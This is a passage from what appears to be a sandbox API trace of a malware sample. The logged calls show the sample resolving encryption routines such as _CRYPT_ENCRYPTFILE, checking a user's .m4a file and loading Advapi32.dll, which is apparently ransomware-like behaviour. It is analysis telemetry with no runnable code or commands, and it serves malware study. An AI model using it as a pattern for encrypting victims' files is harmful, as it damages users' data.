dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.424] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0181.424] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.424] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0181.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.424] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0181.424] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0181.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.425] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0181.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.425] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.425] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0xe92c4280, ftLastWriteTime.dwHighDateTime=0x1d5ddc7, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 0x90add8 [0181.427] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.427] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0xe92c4280, ftLastWriteTime.dwHighDateTime=0x1d5ddc7, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 0x90add8 [0181.427] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0181.427] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ADuuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Duuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uuj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uj\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9zmv2.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.430] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.430] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0181.430] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.431] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.431] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.431] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.431] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.431] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.431] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.431] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0xe92c4280, ftLastWriteTime.dwHighDateTime=0x1d5ddc7, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 0x90ae18 [0181.431] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.431] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.431] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.432] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.432] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0181.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0181.432] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, 